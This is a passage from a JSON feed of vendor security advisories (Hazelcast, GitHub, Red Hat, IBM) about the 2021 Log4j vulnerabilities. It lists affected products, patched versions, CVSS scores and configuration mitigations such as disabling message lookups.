Code Execution vulnerability, has been investigated by Hazelcast team as well and it is found that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-45105 on 12/14/2021, which can cause a Denial of Service attack, was investigated by Hazelcast team and it is confirmed that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-44832 on 12/28/2021, which is a medium vulnerability, is investigated by our security team as well, and not considered to be as critical. It requires attacker to be able to modify logging configuration, which means attacker can modify the filesystem and/or can already execute arbitrary code which is more of a general security breach rather than something log4j specific.\n\nNote that Hazelcast IMDG and IMDG Enterprise itself is not affected.\n\nHowever, given version distributions are considered to be vulnerable since related ZIP and TGZ distributions contain a vulnerable Hazelcast Management Center version.\n\n### Patches\nCVE-2021-44228 is fixed in log4j 2.15.0.\nCVE-2021-45046 is fixed in log4j 2.16.0.\nCVE-2021-45105 is fixed in log4j 2.17.0.\nCVE-2021-44832 is fixed in log4j 2.17.1.\n\nAs of 12/21/2021, Hazelcast team has released a new version of all affected products that upgrades log4j to 2.17.0 as listed below: \nHazelcast Management Center 4.2021.12-1, Hazelcast Management Center 5.0.4.\nHazelcast IMDG and IMDG Enterprise 4.0.5, 4.1.8 and 4.2.4.\nHazelcast Jet 4.5.3.\nHazelcast Platform 5.0.2.\n\nAs of 01/06/2022, Hazelcast Management Center 4.2022.01 with the updated log4j 2.17.1 is released. log4j2.17.1 will be included in Management Center 5.1 that is expected to be released in February. \n\nHazelcast recommends upgrading to the latest versions available.\n\n### Workarounds\nFor users that an upgrade is not an option, below mitigations can be applied.\n\n#### Disabling lookups via Environment Variable \nSetting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true .\nThis option is the easiest to apply for containerized environments.\n\n#### Disabling lookups in log4j2 configuration\nAnother good option since there is no need to replace JARs or no need to modify logging configuration file, users who cannot upgrade to 2.17.0 can mitigate the exposure by:\n\nUsers of Log4j 2.10 or greater may add `-Dlog4j2.formatMsgNoLookups=true `as a command line option or add `-Dlog4j2.formatMsgNoLookups=true` in a `log4j2.component.properties` file on the classpath to prevent lookups in log event messages.\nUsers since Log4j 2.7 may specify `%m{nolookups}` in the PatternLayout configuration to prevent lookups in log event messages.\nAs an example; users deploying Hazelcast Management Center via helm charts can do the following to disable lookups and restart in one command:\n\n`helm upgrade <release-name> hazelcast/hazelcast --set mancenter.javaOpts=\"<javaOpts> -Dlog4j2.formatMsgNoLookups=true\"`\n\nWhere <release-name> is the release name and <javaOpts> is existing java options user has added previously.\n\n#### Removing the JndiLookup from classpath\nRemove the JndiLookup and JndiManager classes from the log4j-core jar. Note that removal of the JndiManager will cause the JndiContextSelector and JMSAppender to no longer function.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-45046\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44832\nhttps://logging.apache.org/log4j/2.x/index.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [our repo](https://github.com/hazelcast/hazelcast)\n* Slack us at [Hazelcast Community Slack](https://slack.hazelcast.com/)\n", "cvss3": {}, "published": "2022-01-21T23:25:04", "type": "github", "title": "Security Advisory for \"Log4Shell\"", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2023-01-11T05:03:57", "id": "GHSA-V57X-GXFJ-484Q", "href": "https://github.com/advisories/GHSA-v57x-gxfj-484q", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-19T17:27:15", "description": "**_January 19, 2022 update: We have added details about the latest GitHub Enterprise Server release and Log4j**_\n\n \n_Today we released new versions of GitHub Enterprise Server ([3.3.2](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.2>), [3.2.7](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.7>), [3.1.15](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.15>), [3.0.23](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.23>)), which update our Log4j dependency to version 2.17.1. Our initial configuration-based mitigation, detailed and released in GitHub Enterprise Server versions [3.3.1](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.1>), [3.2.6](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.6>), [3.1.14](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.14>), and [3.0.22](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.22>), still fully mitigates the risk of the Log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832. We elected to update to this latest version of Log4j as part of our normal release cycle. This upgrade will decrease false positives from file-based vulnerability scanners._\n\n \n\n**_December 17, 2021 update: we have added details of our continued response to CVE-2021-44228 and newly-discovered variants in Log4j**_\n\n \n_GitHub is tracking the latest updates regarding Log4j 2.15 and the subsequent release of Log4j 2.16 and CVE-2021-45046. This week, we have continued to monitor the impact of these variants across our products and infrastructure. Additionally, the GitHub Security Lab has engaged in further analysis to understand our products\u2019 exposure and to actively review and evaluate the effectiveness of our previous mitigations. At this time, we have not identified any additional risk or exposure to GitHub internally or to our products.\n\nDetailed updates for our products are below, with no new action required by users at this time.\n\n### GitHub Enterprise Server[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-enterprise-server>)\n\nElasticsearch is currently the only known exposure to Log4j vulnerabilities in GitHub Enterprise Server. We have internally validated that our mitigation approach for CVE-2021-44228 in GitHub Enterprise Server (released on December 13 in patch version [3.3.1](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.1>), [3.2.6](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.6>), [3.1.14](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.14>), and [3.0.22](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.22>)) also mitigates CVE-2021-45046 and other currently-published variants impacting Log4j. Our releases follow Elasticsearch\u2019s mitigation [suggestions](<https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>) and do **not** require an immediate update to Log4j 2.16.\n\nThe mitigations detailed in our December 13, 2021 post below remain effective and should be followed to secure instances of GitHub Enterprise Server.\n\n### GitHub.com and GitHub Enterprise Cloud[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-com-and-github-enterprise-cloud>)\n\nOn December 14, we finalized our rollout of mitigations for our use of Elasticsearch within GitHub.com and GitHub Enterprise Cloud. We validated this mitigation protects against both CVE-2021-44228 and CVE-2021-45046 in the context of Elasticsearch's use of Log4j. No exploitation has been identified due to our use of Elasticsearch.\n\nIn addition to Elasticsearch, we have continued investigating our impact from other third-party services in our infrastructure and are rolling out remediation and vendor recommendations as they become available. We are actively monitoring our telemetry for signs of exploitation and have not detected any successful exploitation at this time._\n\n* * *\n\n## December 13, 2021: our response to CVE-2021-44228[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#december-13-2021-our-response-to-cve-2021-44228>)\n\nOn Thursday, December 9, 2021, GitHub was made aware of a vulnerability in the Log4j logging framework, [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>). We immediately initiated our incident response process to determine our usage of this framework and its impact across GitHub, our products, and our infrastructure. To assist the community in identifying their usage of the vulnerable Log4j library, we also issued a [GitHub Security Advisory](<https://github.com/advisories/GHSA-jfh8-c2jp-5v3q>) and Dependabot alerts containing general vulnerability details.\n\nThis post summarizes the results of our investigation to date and our recommended next steps for customers.\n\n### GitHub Enterprise Server[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-enterprise-server>)\n\nIn GitHub Enterprise Server\u2019s recommended configuration, CVE-2021-44228 is only exposed to authenticated users. If an instance has been configured to not use [private mode](<https://docs.github.com/en/enterprise-server@3.3/admin/configuration/configuring-your-enterprise/enabling-private-mode>), this vulnerability may also be exposed to unauthenticated users. Customers should consider immediately taking one of two steps below to secure their instances of GitHub Enterprise Server.\n\n 1. Upgrade to a new version of GitHub Enterprise Server that contains changes to mitigate the Log4j vulnerability. The new releases that mitigate this vulnerability are [3.3.1](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.1>), [3.2.6](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.6>), [3.1.14](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.14>), and [3.0.22](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.22>).\n 2. Upgrade an existing GitHub Enterprise Server instance to the latest patch release with a hotpatch by [following our hotpatch instructions](<https://docs.github.com/en/enterprise-server@3.3/admin/enterprise-management/updating-the-virtual-machine-and-physical-resources/upgrading-github-enterprise-server#upgrading-with-a-hotpatch>). This method will allow the instance to be upgraded without a maintenance window.\n\n### GitHub.com and GitHub Enterprise Cloud[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-com-and-github-enterprise-cloud>)\n\nFollowing the public vulnerability disclosure, we took immediate action on the evening of Friday, December 10 to begin mitigating any impact to GitHub.com and GitHub Enterprise Cloud. We reviewed telemetry and deployed additional monitoring, neither of which have detected any successful exploitation at this time. We continue to monitor the situation for any new developments. No action by users of GitHub.com or GitHub Enterprise Cloud is required in order to continue safely using GitHub.com.\n\n### Conclusion[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#conclusion>)\n\nWe are continuing to investigate our exposure to this vulnerability and will provide further updates if any new risk to our users or our products is identified.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T19:06:34", "type": "github", "title": "GitHub\u2019s response to Log4j vulnerability CVE-2021-44228", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T16:28:57", "id": "GITHUB:070AFCDE1A9C584654244E41373D86D8", "href": "https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2022-01-20T13:30:59", "description": "This release of Red Hat build of Eclipse Vert.x 4.1.8 GA includes security updates. For more information, see the release notes listed in the References section.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T12:09:30", "type": "redhat", "title": "(RHSA-2022:0083) Moderate: Red Hat build of Eclipse Vert.x 4.1.8 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T12:09:40", "id": "RHSA-2022:0083", "href": "https://access.redhat.com/errata/RHSA-2022:0083", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T11:45:59", "description": "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.2.3 replaces Data Grid 8.2.2 and includes bug fixes and enhancements. Find out more about Data Grid 8.2.3 in the Release Notes [3].\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T11:36:05", "type": "redhat", "title": "(RHSA-2022:0205) Moderate: Red Hat Data Grid 8.2.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T11:36:29", "id": "RHSA-2022:0205", "href": "https://access.redhat.com/errata/RHSA-2022:0205", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T19:32:24", "description": "This update of Red Hat Integration - Camel Extensions for Quarkus serves as a replacement for 2.2 GA and includes the following security Fix(es):\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T18:50:57", "type": "redhat", "title": "(RHSA-2022:0222) Moderate: Red Hat Integration Camel Extensions for Quarkus 2.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T18:51:20", "id": "RHSA-2022:0222", "href": "https://access.redhat.com/errata/RHSA-2022:0222", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T19:28:35", "description": "A minor version update (from 1.6.2 to 1.6.3) is now available for Red Hat Camel K that includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T18:51:49", "type": "redhat", "title": "(RHSA-2022:0223) Moderate: Red Hat Integration Camel-K 1.6.3 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T18:52:01", "id": "RHSA-2022:0223", "href": "https://access.redhat.com/errata/RHSA-2022:0223", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T17:34:05", "description": "Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.\n\nThis asynchronous patch is a security update for Red Hat JBoss Enterprise Application Platform 7.4.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T15:56:27", "type": "redhat", "title": "(RHSA-2022:0216) Low: Red Hat JBoss Enterprise Application Platform 7.4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T15:56:55", "id": "RHSA-2022:0216", "href": "https://access.redhat.com/errata/RHSA-2022:0216", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T09:27:28", "description": "The releases of Red Hat Fuse 7.8.2, 7.9.1 and 7.10.1 serve as a patch to Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot and includes security fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T09:22:41", "type": "redhat", "title": "(RHSA-2022:0203) Critical: Red Hat Fuse 7.8-7.10 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T09:23:05", "id": "RHSA-2022:0203", "href": "https://access.redhat.com/errata/RHSA-2022:0203", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-10-01T01:44:15", "description": "## Summary\n\nIBM Tivoli Netcool/OMNIbus Common Integration Libraries is vulnerable to arbitrary code execution and denial of service due to Apache Log4j as part of the logging functionality. These vulnerabilities have been addressed. The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus Integration - Transport Module Common Integration Library | common-transportmodule-12_0 up to and including common-transportmodule-33_2 \nIBM Tivoli Netcool/OMNIbus Integration - Java Netcool Utility Library | common-jnetcool-7_0 up to and including common-jnetcool-8_2 \n \n## Remediation/Fixes\n\nIBM strongly recommends fixing the vulnerabilities now by upgrading. \n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus Integration - Transport Module Common Integration Library | [common-transportmodule-33_4](<https://www.ibm.com/support/pages/node/256461> \"common-transportmodule-33_4\" ) \nIBM Tivoli Netcool/OMNIbus Integration - Java Netcool Utility Library | [common-jnetcool-8_4](<https://www.ibm.com/support/pages/node/255019> \"common-jnetcool-8_4\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHTQ\",\"label\":\"Tivoli Netcool\\/OMNIbus\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"8.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 